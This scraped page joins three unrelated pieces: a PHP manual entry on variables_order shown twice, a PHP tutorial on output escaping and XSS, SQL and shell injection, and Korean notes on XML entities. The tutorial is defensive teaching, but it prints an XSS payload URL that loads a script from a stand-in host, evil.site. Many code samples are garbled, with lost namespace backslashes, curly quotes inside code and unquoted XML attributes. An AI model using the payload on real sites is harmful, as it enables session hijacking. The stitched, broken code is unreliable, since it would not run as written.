junecnol:

variables_order string

Sets the order of the EGPCS (Environment, Get, Post, Cookie, and Server) variable parsing. For example, if variables_order is set to “SP” then PHP will create the superglobals $_SERVER and $_POST, but not create $_ENV, $_GET, and $_COOKIE. Setting to “” means no superglobals will be set.

If the deprecated register_globals directive is on, then variables_order also configures the order the ENV, GET, POST, COOKIE and SERVER variables are populated in global scope. So for example if variables_order is set to “EGPCS”, register_globals is enabled, and both $_GET[‘action’] and $_POST[‘action’] are set, then $action will contain the value of $_POST[‘action’] as P comes after G in our example directive value.

Warning

In both the CGI and FastCGI SAPIs, $_SERVER is also populated by values from the environment; S is always equivalent to ES regardless of the placement of E elsewhere in this directive.

Note:

The content and order of $_REQUEST is also affected by this directive.

junecnol:

variables_order string

Sets the order of the EGPCS (Environment, Get, Post, Cookie, and Server) variable parsing. For example, if variables_order is set to “SP” then PHP will create the superglobals $_SERVER and $_POST, but not create $_ENV, $_GET, and $_COOKIE. Setting to “” means no superglobals will be set.

If the deprecated register_globals directive is on, then variables_order also configures the order the ENV, GET, POST, COOKIE and SERVER variables are populated in global scope. So for example if variables_order is set to “EGPCS”, register_globals is enabled, and both $_GET[‘action’] and $_POST[‘action’] are set, then $action will contain the value of $_POST[‘action’] as P comes after G in our example directive value.

Warning

In both the CGI and FastCGI SAPIs, $_SERVER is also populated by values from the environment; S is always equivalent to ES regardless of the placement of E elsewhere in this directive.

Note:

The content and order of $_REQUEST is also affected by this directive.

 
 
Lazycat.orgPHP Tips

Safer PHP output

Most PHP scripts produce output of some kind. When you produce that output, you need to make sure that your output is properly escaped, whether you’re making an HTML page, an XML file or a JSON feed. PHP can’t do this automatically, so you need to know what output escaping is, and how, when and why to do it.

To understand output escaping, it’s useful to know how HTML works. The M stands for Mark-up; in other words, an HTML file contains both content and commands. The commands mark up sections of content – as headings, bold text, or scripts – or they embed special characters, images, or scripts. To separate content and commands, HTML reserves three characters: <, >, and &. HTML tags are wrapped with the < and > characters, which means you can’t use them for anything else.

So what if you want to write < or > in your content? You need to use HTML entities. These are commands that embed special characters. Specifically these four entities:

Character Entity name Entity code < Less-than &lt; > Greater-than &gt; & Ampersand &amp; ” Double-quote &quot;

There are about 250 other named entities (and numeric ones too), but if you use UTF-8 these are the only four HTML entities you’ll ever need.

So when you output into an HTML page with PHP, you need to convert <, >, and & in your output into the HTML entities for those characters, otherwise you’ll either trip up the parser (breaking your layout), or worse, insert HTML commands where you don’t mean to. There’s a whole class of attacks that exploit non-escaped output: they’re called cross-site scripting attacks (or XSS for short; CSS was already taken!)

The anatomy of an XSS attack

Here’s a terrible script:

<?php $name = $_GET['name']; echo "Hi $name!";

It’s terrible for two reasons: the first is that the input isn’t filtered. You can read about doing that here. The second is that the output isn’t escaped. This means that someone can create a URL like http://example.com/yourscript.php?name=<script src="http://evil.site/evil.js"></script> and then then send that URL to someone else.

When they click on it, the remote script is run on your page in the visitor’s web browser. It has access to everything that visitor does on your site. If they’re logged in, then that script can steal or set cookies (allowing an attacker to hijack a login session), it can perform actions using the visitor’s login (like ordering a product to a different address, creating a new user, etc – this is a sub-class of attack called “Cross site request forgery”). It can change the HTML of your page to add forms and links that ask for personal and financial details. In short, it’s bad news. But it’s also easy to avoid.

Basic HTML escaping

The first thing to do is to filter your input. Names will never need to contain HTML tags, so just use the default FILTER_SANITIZE_STRING filter, and it’ll remove HTML and PHP tags. The second thing to do is to escape your output using the htmlspecialchars() function. Either approach will help on its own, but you should always use both.

<?php $name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_STRING); echo 'Hi '. htmlspecialchars($name, ENT_COMPAT, 'UTF-8');

htmlentities vs htmlspecialchars

There are two functions in PHP that will do HTML escaping: htmlentities() and htmlspecialchars(). If you’re outputting HTML or XML in UTF-8 (and unless you have a good reason not to, you should), then the latter’s all you need. If you’re producing XML you pretty much have to use htmlspecialchars(), because hardly any of the entities produced by htmlentities() exist in XML (unless you declared them yourself).

Notice that you need to specify the output character set. If you don’t, the function will use the default character set (which is usually ISO-8859-1, which covers some western European languages like English), and other special characters will be mangled or removed entirely. If you’ve never heard about character sets before, you’re probably from a native English-speaking country, and you don’t know how annoying they were until Unicode came long. The good news is that for pretty much anything you’d want to do in PHP, using UTF-8 will deal with all those nasty little problems.

The other parameter in the htmlspecialchars() call is ENT_COMPAT. I’ve used that because it’s a safe default: it will also escape double-quote characters ". You only really need to do that if you’re outputting inside an HTML attribute (like <img src="<?php echo htmlspecialchars($img_path, ENT_COMPAT, 'UTF-8')">). You could use ENT_NOQUOTES everywhere else. While I’ve got your ear: I know that technically you can use single-quotes in HTML 4 attributes (<br clear='all'>), but don’t. It’s horrible.

When to escape output

You might be tempted to escape variables when you load them in. Something like:

<?php $name = htmlspecialchars(filter_input(INPUT_GET, 'name'), ENT_COMPAT, 'UTF-8');

Don’t do this. Escape output when you’re outputting, not before. Escaping output depends on the kind of output you’re producing. What if you want to make a CSV file later? Or a JSON response to an AJAX script? Both need different kinds of escaping, and seeing a load of &lt;s in your Excel sheet isn’t going to improve your day.

Also if you’re coding well, the code that does stuff will be separate from the code that shows stuff on screen, and you’ll be able to tell just by looking at your template whether your output has been escaped, instead of needing to trace a variable back all the way through your code.

Other forms of output escaping

XML

Many XML libraries (like the built-in SimpleXML, DOMDocument and XMLWriter) will handle escaping for you; check first though, double-escaping is embarrassing, but not escaping at all can be deadly.

Javascript

PHP doesn’t have a built-in way to escape Javascript, but you can cheat and use the json_encode() function. There are some important caveats:

  1. Make sure your output is a string. json_encode() does much more than just string conversion.
  2. JSON is always UTF-8, so make sure the page you’re embedding it in is too.
  3. If you’re setting a Javascript variable which will then be displayed as HTML, you need to use htmlspecialchars() and json_encode().

A better idea is to use the Zend Escaper component from the Zend Framework. It’s available as a Composer package so it’s easy to install and easier to use:

<?php use ZendEscaperEscaper; $escaper = new Escaper('UTF-8'); echo $escaper->escapeJs($name);

As with json_encode(), if you’re outputting a javascript string which will wind up as HTML on a page somewhere, you should escape the HTML too:

<?php echo $escaper->escapeJs( $escaper->escapeHtml($name) );

If you’re using Twig templates (they’re fantastic, by the way; highly recommended), then you can escape javascript safely like this:

{{ name | e('js') }}

Database (SQL)

You can escape SQL, but there’s a much better alternative, which is to use so-called “parameterised queries”. Most databases support these. In a parameterised query, you put placeholders in your SQL command where the data would normally go and then send the data separately, so there’s never a chance that data can be mis-interpreted as a command (a class of attack known as “SQL injection”). The database (or database library) will safely combine the command and data itself. Prepared SQL statements with placeholders are safer than constructing the full SQL command yourself, and can be much quicker (especially if it’s a statement that’ll be run multiple times).

SQL injection attacks are among the worst kind of website security hole; they’re easy to discover, easy to exploit, and the potential for damage is tremendous, especially if your database isn’t properly secured.

I’ve got a separate article about using prepared statements in PDO and the Doctrine DBAL (which extends it). If you’re not using one of these (or something that builds on them, like Doctrine ORM or Laravel’s Eloquent ORM if you still think ActiveRecord is cool), then you’re crazy.

Command-line tools

Obviously the potential for mischief when you expose the command-line to the web via your script is pretty bad. If you can possibly avoid it (and most likely you can), then do. If you must, then use escapeshellarg() on each argument you pass to exec(), system() or the backtick operator.

Among the Symfony Process component‘s many nifty features, its ProcessBuilder class will automatically prepare and escape a command for you:

<?php use SymfonyComponentProcessProcessBuilder; $builder = new ProcessBuilder(array('ls', '-lsa')); $builder->getProcess()->run();

Email

If you don’t properly escape output for email headers, a moderately clever attacker can highjack the entire message and replace it with one of their own, sent to whoever they like. The easy way to avoid this is not to use PHP’s built-in mail() function at all, and instead use something like Swiftmailer or Zend Mail:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

<?php
// Zend Mail
use ZendMail;
 
$mail = new MailMessage();
$mail->setBody(‘This is the text of the email.’);
$mail->setFrom(‘web@example.org’, ‘My site’);
$mail->addTo(‘recipient@example.com’, ‘Their name’);
$mail->setSubject(‘Test Subject’);
 
$transport = new MailTransportSendmail();
$transport->send($mail);
 
// Swift Mailer
$message = Swift_Message::newInstance();
$message->setFrom(array(
‘web@example.org’ => ‘My site’,
));
$message->setTo(array(
‘recipient@example.com’ => ‘Their name’,
));
$message->setSubject(‘My subject’);
$message->setBody(‘Hello world’, ‘text/plain’);
 
$transport = Swift_MailTransport::newInstance();
$mailer = Swift_Mailer::newInstance($transport);
$mailer->send($message);

Both Zend Mail and Swift Mailer offer huge advantages over the plain mail() function; for example they can handle attachments, easy HTML email, inline images and encrypted mail server connections, so safe output escaping is only one good reason to use them.

printing HTML

It’s bad form to write PHP that writes HTML: it’s harder to update your page layout, and it’s harder to correctly escape your output. So avoid this:

<?php echo "<a href="$url">$name</a>"; ?>

And instead do this:

<a href="<?php echo htmlspecialchars($url, ENT_COMPAT, 'utf-8'); ?>"> <php echo htmlspecialchars($name, ENT_NOQUOTES, 'utf-8'); ?> </a> 

If you’re thinking that looks long, ugly and verbose, then … well, you’re right. Use Twig instead, and you’ll get a cleaner separation of code and templates, manual and automatic output escaping, and template inheritance that can really reduce the amount of work needed to update your site.

Installing Twig

Installing and setting up Twig is easy with the Composer PHP package manager. Download it by running this from your command-line:

Then create a composer.json file:

{ "require": { "twig/twig": "~1.12" } }

Install Twig into a new (or existing) vendor/twig folder with:

php composer.phar install

Twig setup

It’s good practice to keep most of your code, templates and libraries out of your website’s root folder. Ideally something like:

  • myproject/

    • cache/ – compilation caches, other temporary files
    • src/ – most of your code should go here
    • templates/ – Twig templates
    • test/ – your test suite
    • vendor/ – 3rd party libraries managed by Composer
    • web/– The website root folder
      • images/
      • js/
      • css/
      • etc…

Put most of your code in src/, and place just enough code in web/ to load and run that code. For the sake of a short example though, here’s a basic web/example.php and templates/index.twig:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

<?php
require __DIR__.’/../vendor/autoload.php’;
 
$loader = new Twig_Loader_Filesystem(__DIR__.’/../templates’);
$twig = new Twig_Environment($loader, array(
// Uncomment the line below to cache compiled templates
// ‘cache’ => __DIR__.’/../cache’,
));
 
$name = filter_input(INPUT_GET, ‘name’, FILTER_SANITIZE_STRING);
if (!$name) {
$name = “Mercury, Venus, Mars, Jupiter, Saturn, Uranus & Neptune.”;
}
 
echo $twig->render(‘index.twig’, array(
‘name’ => $name,
));
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

<!DOCTYPE html>
 
<html>
<head>
<meta http-equiv=“Content-type” content=“text/html; charset=utf-8″>
<title>Twig test</title>
</head>
<body>
<h1>Hello world</h1>
<p>And hello {{ name }}</p>
</body>
</html>
view raw index.twig This Gist brought to you by GitHub.

Twig’s easy to learn and use, and tremendously powerful. Read the documentation to get started.


Feedback

Please send me corrections; I know someone’s always wrong on the internet, and I’d appreciate knowing if it’s me.

It should go without saying, but any example code shown on this site is yours to use without obligation or warrantee of any kind. As far as it’s possible to do so, I release it into the public domain.

ENTITY

 

1) 엔티티 개념

- 사전적 의미로는 실체 또는 독립된 객체이다. XML 권고안에서는 XML문서를 구성하는 물리적인

저장 단위(Storage unit) 이라 정의하고 있다.

            

- ~.xml 파일의 경우 도큐먼트 엔티티라 부르고, 외부DTD서브셋 문서를 외부DTD서브셋 엔티티라

부른다.(XML 권고안)

 

- XML문서의 물리적인 저장단위로 기본이 되는 엔티티가 바로 도큐먼트 엔티티 이다. 모든 XML문서는

한 개의 도큐먼트 엔티티를 가져야 한다.

 

- 다음은 도큐먼트 엔티티를 포함해서 7가지의 엔티티를 정의하고 있다.(XML 권고안)

도큐먼트 엔티티                          외부 DTD 서브셋 엔티티                             Built_in 엔티티

내부 일반 파스드 엔티티             외부 일반 파스드 엔티티               

외부 일반 언파스드 엔티티          내부 파라미터 엔티티                                  외부 파라미터 엔티티

 

2) 엔티티 용도

- XML문서를 엔티티인 저장단위로 나누는 이유는 재사용성을 높이기 위해서이다.

- 여러 개의 XML문서에 특정부분에 동일한 내용을 작성할 경우를 생각해보자.

동일 내용을 매번 직접 작성시 시작적으로 오래 걸릴뿐 아니라, 오타의 위험성도 있다.

게다가 일부 내용의 수정이 있을 경우 모든 XML문서를 일일이 수정해야 할 것이다.

이 경우, 동일한 내용만을 가지는 외부 일반 파스드 엔티티를 하나 만들고, XML문서는 이를 참조사용

 

3) 엔티티 분류

- 다음은 물리적인 저장 단위 존재 여부에 따른 구분으로서 엔티티가 파일로 존재하는지 아닌지에 따라

다음과 같은 접두사가 붙는다.

 

구분        물리적 저장 단위

내부         없음. DTD내에서 특정 내용으로 선언될 경우

외부        파일 형태로 존재할 경우

 

 

- 사용되는 곳에 따른 구분

참조되는 곳             엔티티 명

일반           XML문서에서 참조하여 사용할 경우

파라미터      DTD내에서 참조하여 사용할 경우

 

- XML파서가 파싱할 수 있는 문자데이터로 이루어졌는지에 대한 여부

참조되는 곳            엔티티 명

파스드        XML파서가 해석할 수 있는 문자 데이터로 구성된 경우

언파스드          XML파서가 해석할 수 없는 비문자 데이터로 구성된 경우

            대표적인 언파스드 엔티티는 그림, 음악, 동영상파일 등이 있다.

 

4) Built-in 엔티티

- 미리 정의되어 있는 엔티티를 말하며, 별도의 엔티티 선언없이 XML에서 사용 가능한 엔티티.

XML 문서에서 참조방법

치환될 문자

의미

<

less-than

>

greater-than

&

&

ampersand

double-quote

&apos;

single-quote

 

5) 내부 일반 파스드 엔티티 - DTD문서 내에서 특정 문자 데이터값으로 선언되기 때문에 물리적 저장단위인 파일형태를 가지지

않는다. 선언 위치는 DTD내부 어디든지 상관없다. 일반적으로 텍스트 선언 바로 밑에 선언한다.

             <!ENTITY  엔티티명  대치할 문자 데이터

            

&엔티티명;

            

내부 일반 파스드 엔티티 예제)

ch3_1201.dtd

<?xml version=1.0 encoding=utf-8 ?>

 

<!– 내부 일반 엔티티 –>

<!ENTITY kr 대한민국>

<!ENTITY fr 프랑수>

<!ENTITY us 미국>

 

<!ELEMENT booklist (book*)>

<!ELEMENT book (title, author, nation)>

<!ELEMENT title (#PCDATA)>

<!ELEMENT author (#PCDATA)>

<!ELEMENT nation (#PCDATA)>

 

<!ATTLIST author nation CDATA #IMPLIED>

 

ch3_1201.xml

<?xml version=1.0 encoding=utf-8 ?>

 

<!DOCTYPE booklist SYSTEM ch3_1201.dtd>

 

<booklist>

           <book>

                     <title>슈퍼맨</title>

                     <author>누구</author>

                     <nation>&fr;</nation>

           </book>

           <book>

                     <title>배트맨</title>

                     <author nation=&kr;>나다</author>

                     <nation>&us;</nation>

           </book>         

</booklist>

 

6) 외부 일반 파스드 엔티티

- 파일명은 xml이 아닌 다른 이름을 사용해도 무방하다.

<!ENTITY   엔티티명  SYSTEM  외부 일반 파스드 엔티티  URI 경로

- 선언 위치는 어디든 상관없다. 일반적으로 텍스트 선언 바로 밑에 선언한다.

<!ENTITY  엔티티명  SYSTEM  외부 일반 파스드 엔티티 파일명>

<!ENTITY  엔티티명  SYSTEM  “http://웹서버 주소/경로명/…/외부일반파스드엔티티명”>

- &엔티티명;

 

외부 파라미터 엔티티 예제)

ch3_1201_1.xml

<?xml version=1.0 encoding=utf-8 ?>

 

<kinds>

           <kind id=k1>소설</kind>

           <kind id=k2>수필</kind>

           <kind id=k3>컴퓨터</kind>

</kinds>

 

ch3_1202.dtd

<?xml version=1.0 encoding=utf-8 ?>

 

<!ENTITY kind SYSTEM ch3_1201_1.xml>  <!– 파일에 있는 kind 가져다 쓰겠다. –>

<!ELEMENT booklist (kinds, book*)>

<!ELEMENT kinds (kind*)>

<!ELEMENT kind (#PCDATA)>

 

<!ELEMENT book (title, author)>

<!ELEMENT title (#PCDATA)>

<!ELEMENT author (#PCDATA)>

 

 

<!ATTLIST kind id ID #REQUIRED>

<!ATTLIST book id ID #REQUIRED

                                          kind IDREF #REQUIRED>

                                          

 

ch3_1202.xml

<?xml version=1.0 encoding=utf-8 ?>

 

<!DOCTYPE book SYSTEM ch3_1202.dtd>

 

<booklist>

           &kind;

           <book id=b1 kind=k1>

                     <title>하하</title>

                     <author>ㅋㅋㅋ</author>

           </book>

           <book id=b2 kind=k3>

                     <title>XML</title>

                     <author>홍길동</author>

           </book>

</booklist>

 

7) 외부 일반 언파스드 엔티티

- 비문자 데이터로 이루어진 저장단위를 말한다.

- 음악파일, 그림파일, 동영상파일 등이 여기 속한다.

- 외부 일반 언파스드 엔티티를 XML문서에서 참조하기 위해서는 DTD내에서 NOTATION 선언이 필요.

 

8) 내부 파라미터 엔티티

- 한 개의 DTD문서 내에서 자주 사용되는 부분을 내부 파라미터 엔티티로 선언해 두고, DTD문서

내에서는 반복적인 코딩을 하는 대신 해당 엔티티명을 참조해서 직접 작성한 것과 같은 동일한 효과

<!ENTITY  %  엔티티명  대치할 DTD 내용의 일부분”>

 

- 선언 위치는 반드시 참조되기 전에 와야한다. 일반적으로 텍스트 선언 바로 밑에 한다.

- %의 앞과 뒤에는 반드시 공백 문자열이 와야 한다.

- 다음은 DTD내에서 내부 파라미터 엔티티를 참조하는 문법이다.        %엔티티명;

 

내부 파라미터 엔티티 예제)

ch3_1203.dtd

<?xml version=1.0 encoding=utf-8 ?>

 

<!– 내부 파리미터 파스드 엔티티 –>

<!ENTITY % maninfo (name, age, tel)>

 

<!ELEMENT members (chief |manager|waiter)*>

<!ELEMENT chief %maninfo>

<!ELEMENT manager %maninfo>

<!ELEMENT waiter %maninfo>

 

<!ELEMENT name (#PCDATA)>

<!ELEMENT age (#PCDATA)>

<!ELEMENT tel (#PCDATA)>

 

 

ch3_1203.xml

<?xml version=1.0 encoding=utf-8 ?>

 

<!DOCTYPE members SYSTEM ch3_1203.dtd>

 

<members>

           <chief>

                     <name>홍길동</name>

                     <age>20</age>

                     <tel>111-1111</tel>

           </chief>

           <manager>

                     <name>임꺽정</name>

                     <age>22</age>

                     <tel>122-1111</tel>

           </manager>

           <waiter>

                     <name>이순신</name>

                     <age>21</age>

                     <tel>221-1111</tel>

           </waiter>

</members>

 

 

9) 외부 파라미터 엔티티

<!ENTITY  %  엔티티명  SYSTEM  외부 파라미터 엔티티 URI 경로”>

 

외부 파라미터 엔티티 예제)

ch3_1204_1.dtd

<?xml version=1.0 encoding=utf-8 ?>

 

<!ENTITY % maninfo (name, age, tel)>

 

<!ELEMENT name (#PCDATA)>

<!ELEMENT age (#PCDATA)>

<!ELEMENT tel (#PCDATA)>

 

ch3_1204.dtd

<?xml version=1.0 encoding=utf-8 ?>

 

<!– 외부 파라미터 엔티티 선언 –>

<!ENTITY % maninfo_element SYSTEM ch3_1204_1.dtd>

 

<!– 외부 파라미터 엔티티 참조 –>

%maninfo_element;

 

<!ELEMENT members (chief |manager|waiter)*>

<!ELEMENT chief %maninfo>

<!ELEMENT manager %maninfo>

<!ELEMENT waiter %maninfo>